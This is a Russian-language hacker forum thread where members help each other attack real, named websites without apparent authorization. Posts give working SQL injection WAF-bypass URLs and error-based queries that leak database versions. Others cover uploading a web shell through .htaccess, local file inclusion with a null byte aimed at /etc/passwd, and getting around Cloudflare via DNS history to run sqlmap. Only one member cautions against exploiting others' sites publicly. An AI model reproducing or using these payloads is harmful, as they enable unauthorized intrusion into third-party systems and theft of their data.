Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,401
    Likes Received:
    875
    Reputations:
    858
    Можно было просто взять пакет запроса с акунектикса, в уязвимом параметре поставить звездочку, сохранить в файл и вызвать его параметром -r file.txt
     
    _________________________
    fandor9, Duble, joelblack and 2 others like this.
  2. Samozvanec

    Samozvanec New Member

    Joined:
    19 Jul 2020
    Messages:
    5
    Likes Received:
    3
    Reputations:
    1
    Доброго времени, уважаемые ачатовцы! Я начинаю изучать SQL-injection, при этом у меня есть базовые знания SQL синтаксиса, которые я продолжаю развивать, но пока они находятся на уровне написания не сложных запросов и понимания их работы, включая вложенные функции. Недавно просматривая забугорный PoC по sql-inj наткнулся на интересный запрос, который помог человеку обойти фильтрацию. А именно:

    Code:
    products.php?id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
    Мне не совсем понятно, как функция MOD помогла обойти фильтрацию UNION SELECT. Forbidden. Я знаю, что данная функция выводит нам остаток от деления. В указанном примере он получается 5. Но как это работает? Что происходит на бэке "за кулисами"? Для меня важно это понять.

    Всем заранее спасибо! :)
     
    #2922 Samozvanec, 22 Mar 2021
    Last edited: 22 Mar 2021
  3. fandor9

    fandor9 Reservists Of Antichat

    Joined:
    16 Nov 2018
    Messages:
    582
    Likes Received:
    968
    Reputations:
    40
    В общем всё зависит от WAF/фильтра, но в целом достаточно просто, запрос
    Code:
    id=24 AND mod(53,12)/*!50000union*//**//*!50000select*/ 1,2,3,4,5,6,7,8,9,10%23
    и нужно что-бы после AND было условие которое не равно нулю 53%12=5 т.е. если бы стояло mod(55,11)=55%11=0 и в этом случае условие не выполняется и соответственно скуля (энион) не будет выполнятся.
    В конце концов выйдет так:
    Code:
    24 AND 5 UNION SELECT 1,2,3,4,5,6,7,8,,9,10#
    Скорее всего фильтр вырезал значения типа 1=1, True, 1 и т.д. но пропускал функции. Вместо MOD можно было-бы вставить UNHEX(32), CONVERT..
     
  4. Samozvanec

    Samozvanec New Member

    Joined:
    19 Jul 2020
    Messages:
    5
    Likes Received:
    3
    Reputations:
    1
    Надо же, как всё тривиально! И как же я сам до этого не додумался! Спасибо огромное за ответ! :)
     
  5. 3nvY

    3nvY Member

    Joined:
    8 Jun 2015
    Messages:
    48
    Likes Received:
    20
    Reputations:
    11
    Доброго времени суток. Столкнулся с проблемой при загрузке шелла.
    На сайте есть функция загрузки аватарки, в запросе можно подменить расширение файла на какое угодно. Файл успешно грузится на сервак, но при переходе по ссылке он открывается как пикча (как ссылка внутри тега img), какое бы расширение я не выбрал. В ответе сервер возвращает content type image/jpeg (или тот, биты которого я подставляю в пэйлоад). Подмена mime type в реквесте на отличное от gif/png/jpeg не дает залить файл.

    Как можно запустить код эксплойта?

    Сервер: nginx
     
    #2925 3nvY, 27 Mar 2021
    Last edited: 27 Mar 2021
  6. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,156
    Likes Received:
    421
    Reputations:
    231
    Попробуй залить .htaccess с разрешение на пхп
     
  7. Samozvanec

    Samozvanec New Member

    Joined:
    19 Jul 2020
    Messages:
    5
    Likes Received:
    3
    Reputations:
    1
    Всем здравствуйте! Помогите, пожалуйста, крутануть. Не могу обойти waf по UNION SELECT

    Code:
    www.royalporcelain.co.th/agent-download.php?code=here%27+union+select+1,2,3,4,5,6,7--+-
    PS

    waf обошел,

    Code:
    http://www.royalporcelain.co.th/agent-download.php?code=here%27+union/**_**/select+1,2,3,4,5,6,7--+-
    но не могу спровоцировать вывод уязвимых полей
     
    #2927 Samozvanec, 30 Mar 2021
    Last edited: 30 Mar 2021
  8. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    288
    Likes Received:
    133
    Reputations:
    28
    Всем привет!

    Code:
    $page = isset($_GET['lang']) ? $_GET['lang'] : 'default';
    if (! is_file('./language/'.$page.'/language.php')) {
        $page = 'default';
    }
    require_once './language/default/language.php';
    if ('default' != $page) {
        include_once './language/'.$page.'/language.php';
    }
    Php version 5.3.6

    Есть вариант в этой версии отсечь префикс или иной вариант раскрутки?
     
  9. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,401
    Likes Received:
    875
    Reputations:
    858
    Эта версия, уязвима к Null байту, %00, т.е можно попробовать, что-то типа ../../../etc/passwd%00
     
    _________________________
    man474019, ms13 and Baskin-Robbins like this.
  10. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    239
    Likes Received:
    435
    Reputations:
    131
    Error-Based например:
    Code:
    http://www.royalporcelain.co.th/agent-download.php?code=-1%27/**_**/AND/**_**/extractvalue(1,concat(0x3a,(select/**_**/@@version)))+--+-
    Code:
    XPATH syntax error: ':5.5.65-MariaDB'
    Agent Code Is Invalid
     
    man474019, crlf, ms13 and 2 others like this.
  11. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    288
    Likes Received:
    133
    Reputations:
    28
    Спасибо за ответ!
    Но Null байт уже чекал, из 60-ти сайтов на двух древних сработало

    Кстати чекал и на более ранних версиях, в том числе PHP/5.3.3 на ней тоже не сработало почему-то
     
  12. Samozvanec

    Samozvanec New Member

    Joined:
    19 Jul 2020
    Messages:
    5
    Likes Received:
    3
    Reputations:
    1

    Огромное спасибо!
     
  13. dooble

    dooble Members of Antichat

    Joined:
    30 Dec 2016
    Messages:
    199
    Likes Received:
    512
    Reputations:
    130
    Фикс был внутри версии 5.3.3, в 5.3.3.7 еще работал, в 5.3.3.8 уже нет.
     
    man474019, crlf, ms13 and 2 others like this.
  14. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    613
    Likes Received:
    1,229
    Reputations:
    393
    Всё в порядке. Тема как раз создавалась для подобных однотипных вопросов, а ваше упорство в попытках постигнуть истинную суть инъекций заслуживает похвалы. Текущее поколение кулхацкеров, скульмаперов и метасплоитеров, тоска жуткая :)

    Иногда полезно какое-то время уделить разработке. С оптытом, придёт понимание абстрактных внутренних процессов и можно будет с большой вероятностью предположить, в какой части логики находится уязвимость и какого рода она может быть. Сходу, смею вангануть, что инъекция находится в запросе выборки категории, по ID которой в дальнейшем будут выбираться позиции для листинга. Следовательно, если нет вывода ошибок, с большой вероятностью можем предположить лишь булевой вариант. Простейшим выходом в данном случае, будет считывание текущего запроса из INFORMATION_SCHEMA.PROCESSLIST вслепую, чтоб точно подтверить/опровергнуть теорию.

    На правах старорега, хотелось бы добавить, что лично я, вообще не поддерживаю раскрутки подобных уязвимостей на чужих площадках публично, дебилов в наше время хватает, поверьте. Но дело каждого, на свой страх и риск как говорится. По поводу же РУ/СНГ ресурсов, вообще есть негласное правило, что их следует стараться обходить стороной, по многим причинам, которые заслуживают отдельного обсуждения, а скорее всего холивара :) Поэтому, настоятельно рекомедую переварить и принять к сведению полученную информацию. Чтоб закрыть вопрос с этим кейсом, взглянул одним глазком, имеет место неопределённое поведение, но инъекции нет.
     
    #2934 crlf, 8 Apr 2021
    Last edited: 8 Apr 2021
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,156
    Likes Received:
    421
    Reputations:
    231
    Помогите ваф обойти, фильтрует юнион селект
    Code:
    http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+uion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
     
  16. WallHack

    WallHack Elder - Старейшина

    Joined:
    18 Jul 2013
    Messages:
    288
    Likes Received:
    133
    Reputations:
    28
    Code:
    http://www.ipcinfo.org/ipc-country-analysis/details-map/en/c/459550+union+distinct+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+/?iso3=AFG%27
     
    sepo, fandor9, Samozvanec and 4 others like this.
  17. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,156
    Likes Received:
    421
    Reputations:
    231
    Не пойму вафа нету, скуля слепая, но скулмап не раскручивает( в чем трабла?
    Code:
    https://www.akbw.de/nc/veranstaltungen/veranstaltungskalender-architekturtreff.html?no_cache=1&tx_fufevents_pi1%5Bsearch%5D%5Borganizer%5D=35110
     
    #2937 DezMond™, 29 May 2021
    Last edited: 29 May 2021
  18. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,156
    Likes Received:
    421
    Reputations:
    231
    Помогите ваф обойти, фильтрует и юнион и селект
    Code:
    https://www.baslerhofmann.ch/index.php?id=2649&L=3&tx_cabagjobs_pi1%5BjobUid%5D=914+/*!12345uNIoN*/++/*!12345sELecT*/+1,2,3,4,5+--+
     
  19. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    239
    Likes Received:
    435
    Reputations:
    131
    Code:
    914+||+(select mid(@@version,1,1)=5)+--+-
     
    scooter, dmax0fw, K800 and 6 others like this.
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,401
    Likes Received:
    875
    Reputations:
    858
    Тут надо клоуд обходить, смотрим ип через DNS history:
    ____viewdns.info/iphistory/?domain=baslerhofmann.ch
    Там будет такая запись:
    Далее просто направляем скульмап и радуемся жизни:

    Итого, что мы имеем:
     
    _________________________
    scooter, dmax0fw, man474019 and 9 others like this.
Loading...